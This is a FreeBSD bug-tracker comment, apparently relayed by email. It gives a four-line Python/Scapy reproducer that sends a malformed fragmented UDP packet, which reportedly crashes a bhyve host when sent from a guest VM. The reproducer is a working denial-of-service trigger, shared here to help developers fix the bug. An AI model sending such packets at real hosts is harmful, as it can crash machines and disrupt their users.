https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=288549

--- Comment #3 from Danilo Egea Gondolfo <[email protected]> ---
Hi,

here is a reproducer (Python + Scapy). I run this from a FreeBSD VM in bhyve
and my host goes kaboom:

from scapy.all import *

udp = UDP(dport=12345, sport=54321)
ip = IP(frag=123, dst="1.1.1.1")/udp

send(ip)

-- 
You are receiving this mail because:
You are the assignee for the bug.

Reply via email to